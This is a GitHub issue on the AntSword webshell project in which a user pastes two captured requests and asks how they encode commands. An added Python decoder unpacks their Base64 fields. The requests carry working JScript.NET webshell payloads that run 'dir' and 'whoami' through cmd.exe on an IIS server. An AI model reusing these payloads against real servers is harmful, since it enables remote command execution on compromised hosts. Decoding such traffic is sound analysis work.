AntSwordProject / antSword

AntSword (蚁剑) is a cross-platform, open-source website management toolkit.

Home Page: https://www.yuque.com/antswordproject/antsword

How does it work?

Sqliman opened this issue · comments

1 request (dir)
86d3=Response.Write("d681f" "ad4cba");var err:Exception;try{eval(System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String("var c=new System.Diagnostics.ProcessStartInfo(System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String(Request.Item["tce6a06fd985ff"].substr(2))));var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c "+System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String(Request.Item["s6944bca71c08e"].substr(2)));if(Request.Item["u56b7825a1a38d"].substr(2)) {var envstr = System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String(Request.Item["u56b7825a1a38d"].substr(2)));var envarr = envstr.split("|||asline|||");var i;for (var i in envarr) {var ss = envarr[i].split("|||askey|||");if (ss.length != 2) {continue;}c.EnvironmentVariables.Add(ss[0],ss[1]);}}e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());")),"unsafe");}catch(err){Response.Write("ERROR:// " err.message);}Response.Write("d80f5" "3bc54");Response.End();&s6944bca71c08e=QEY2QgL2QgIkM6L2luZXRwdWIvd3d3cm9vdC9hc3BuZXRfY2xpZW50IiZkaXImZWNobyA5YzVmZjI0OTRkZCZjZCZlY2hvIDJiNmZiOA==&tce6a06fd985ff=i4Y21k&u56b7825a1a38d=FY

2 request (whoami)
86d3=Response.Write("f60" "b83");var err:Exception;try{eval(System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String("var c=new System.Diagnostics.ProcessStartInfo(System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String(Request.Item["tce6a06fd985ff"].substr(2))));var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c "+System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String(Request.Item["s6944bca71c08e"].substr(2)));if(Request.Item["u56b7825a1a38d"].substr(2)) {var envstr = System.Text.Encoding.GetEncoding("UTF-8").GetString(System.Convert.FromBase64String(Request.Item["u56b7825a1a38d"].substr(2)));var envarr = envstr.split("|||asline|||");var i;for (var i in envarr) {var ss = envarr[i].split("|||askey|||");if (ss.length != 2) {continue;}c.EnvironmentVariables.Add(ss[0],ss[1]);}}e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());")),"unsafe");}catch(err){Response.Write("ERROR:// " err.message);}Response.Write("beb" "a80d");Response.End();&s6944bca71c08e=zmY2QgL2QgIkM6XFxpbmV0cHViXFx3d3dyb290XFxhc3BuZXRfY2xpZW50IiZ3aG9hbWkmZWNobyA5YzVmZjI0OTRkZCZjZCZlY2hvIDJiNmZiOA==&tce6a06fd985ff=G6Y21k&u56b7825a1a38d=aG

Question: how does it work? How is whoami/dir encoded? In what function?
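
For anyone analysing a capture like the two requests above: the pasted script reads each extra form field with `Request.Item["..."].substr(2)` and passes the rest to `FromBase64String`, so a value is two throwaway characters followed by Base64 text. The Python decoder below is an added example, not part of the original issue and not AntSword's own code; the function names are hypothetical, and the sample values are copied from request 1 with the long `86d3` script cut down to its three field reads.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl

# Copied from request 1 on this page. The long script parameter (86d3) is cut
# down to its three Request.Item reads; the variable names are constructed.
SCRIPT_EXCERPT = (
    'FromBase64String(Request.Item["tce6a06fd985ff"].substr(2)) '
    'FromBase64String(Request.Item["s6944bca71c08e"].substr(2)) '
    'FromBase64String(Request.Item["u56b7825a1a38d"].substr(2))'
)
FORM_TAIL = (
    "s6944bca71c08e=QEY2QgL2QgIkM6L2luZXRwdWIvd3d3cm9vdC9hc3BuZXRfY2xpZW50"
    "IiZkaXImZWNobyA5YzVmZjI0OTRkZCZjZCZlY2hvIDJiNmZiOA=="
    "&tce6a06fd985ff=i4Y21k&u56b7825a1a38d=FY"
)

# Matches the field reads visible in the pasted script.
READ_RE = re.compile(r'Request\.Item\["(\w+)"\]\.substr\((\d+)\)')

def reads_from_script(script):
    """Map each field the script reads to the number of leading chars it drops."""
    return {name: int(skip) for name, skip in READ_RE.findall(script)}

def decode_value(value, skip):
    """Drop the skipped prefix, then Base64-decode the rest as UTF-8 text."""
    payload = value[skip:].replace(" ", "+")  # form decoding turns '+' into ' '
    try:
        return base64.b64decode(payload, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None  # not Base64 text after the prefix; leave for manual review

def decode_request(script, form_body):
    """Decode every field that the script itself reads from the request."""
    skips = reads_from_script(script)
    fields = dict(parse_qsl(form_body, keep_blank_values=True))
    return {name: decode_value(fields[name], skip)
            for name, skip in skips.items() if name in fields}

if __name__ == "__main__":
    for name, text in decode_request(SCRIPT_EXCERPT, FORM_TAIL).items():
        print(f"{name}: {text!r}")
```

Run against the fields of request 2, the same steps produce the `whoami` variant of the command line.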